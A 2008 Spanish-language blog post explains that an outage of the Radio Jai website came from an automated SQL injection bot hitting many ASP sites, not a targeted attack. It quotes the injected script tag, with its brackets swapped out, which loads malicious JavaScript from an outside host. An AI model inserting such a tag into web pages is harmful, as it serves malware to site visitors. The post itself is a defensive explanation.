Bienvenido a Israel Noticias. Un blog donde vas a encontrar noticias de Israel, Medio Oriente y el mundo judio.

Para ver más noticias o noticias antiguas, revisa el archivo de noticias en el menú derecho, o usa el buscador ubicado en el menú izquierdo.

Últimas noticias:

Sobre el ataque a la página de Radio Jai

miércoles, 21 de mayo de 2008

Es mi intención, con lo que escribo más abajo, aclarar la situación que se dió y calmar así la preocupación de los oyentes.

En el dia de ayer, la página de Radio Jai dejó de funcionar.
Según pude escuchar de la boca del director de la radio en el programa que va a las 18 hs., "terroristas informáticos" habrían atacado la misma.
Hoy escuche a los locutores de la mañana y el mediodia hablando del ataque de piratas del ciberespacio contra la radio.
Pero la verdad, el colmo fue la grabación que estan pasando constantemente diciendo que "delincuentes informáticos" atacaron la radio para evitar que difunda el mensaje y comunique noticias.
También dice que es un "privilegio no deseado" ya que según ellos el ataque habia sido contra la radio por su importancia en el medio, tomandolo casi como un halago.
Esto no es del todo cierto.

Lo que pasó fue que ayer, la página se vio inundada de un código que se habia introducido en los titulos de todas las noticias.
El codigo fue el siguiente: [script src=http://www.dota11.cn/m.js][/script] (ATENCIÓN: La página que aparece ahi tiene código malicioso, NO ENTRE! - Los simbolos '< ' y '>' fueron reemplazados por '[' y ']' por seguridad)

Me resultó extraño e investigué un poco.
Poniendo este código en Google, aparecen 554 páginas con el mismo código metido en sus titulares. (En Yahoo! aparecen 700).
Ninguna de estas páginas es de la Comunidad, ni son de importancia y van desde páginas de Argentina, México, EEUU hasta China.
Luego encontré que a un par de personas le había pasado lo mismo (aca y aca) en sus propias páginas y habian llegado a la conclusión de que se trataba de un ataque por Inyección de SQL en páginas programadas en ASP.

("Una inyección SQL sucede cuando se inserta o 'inyecta' un código SQL 'invasor' dentro de otro código SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el código "invasor" en la base de datos." - Wikipedia)
Al parecer, en el dia de ayer, varias páginas que no estaban preparadas y actualizadas para protegerse de este tipo de ataques, sufrieron exactamente el mismo daño (como podemos leer aca).
Y no fue culpa de ninguna persona tratando de desestabilizar a la radio por nada en particular como lastimosamente aseguran en su mensaje, sino que el responsable (aparentemente) fue un bot, un código automático, que estuvo dando vueltas ayer por la red buscando páginas que tengan esta vulnerabilidad para despues explotarla, sin importarle de quien es la página.
Lo que hizo este robot fue inyectar en las tablas de la base de datos, un código que insertaba en la página un iframe con código malicioso.
En esta página muestran una lista de hoy de las páginas que alojan este código para ejecutar este tipo de ataques por inyección de SQL, entre las cuales se encuentra dota11.cn (NO ENTRAR!) que es la que apareció en Radio Jai.
Y como cuenta esta persona, el codigo varia de alojamiento (en el caso de la radio es dota11.cn (NO ENTRAR!) ) asi que el número de páginas infectadas es mayor al que habia buscado en un principio.

Como información adicional, queria comentar que hay gente (que seguramente necesita conseguirse una novia) que se la pasa buscando páginas en internet que tengan vulnerabilidades y cuando las encuentran, las explotan sin importarle quien es el dueño de la página.

Conclusión:
Despues de haber conseguido suficientes pruebas, puedo decir casi seguro, que el ataque no fue un ataque directo a la radio por su papel de radio judía, sino un ataque producido porque el servidor SQL no estaba preparado para recibir este tipo de ataques.
(No fue un ataque del ala infórmatica de Hamas ni nada parecido, ni siquiera de alguien que tenga algo contra la radio)

Esto no tiene como objetivo desmerecer a la Radio y el trabajo de todos los que estan tratando de resolver el problema.
Todo lo contrario, con esto espero echar un poco de luz sobre la situación y si alguien de Radio Jai precisa más información o explicación más a fondo pueden mandarme un mail sin compromiso a todosconisrael@gmail.com.

Espero haber aclarado algo de la situación y espero de corazón que el problema pueda ser resuelto lo antes posible.
Escucho la radio todos los dias y lo último que se merecen es tener que resolver problemas por un gusano que anda dando vueltas.

Aprovecho para felicitar a Radio Jai por el trabajo que hacen dia a dia.

Fuente: ConIsrael

0 comentarios: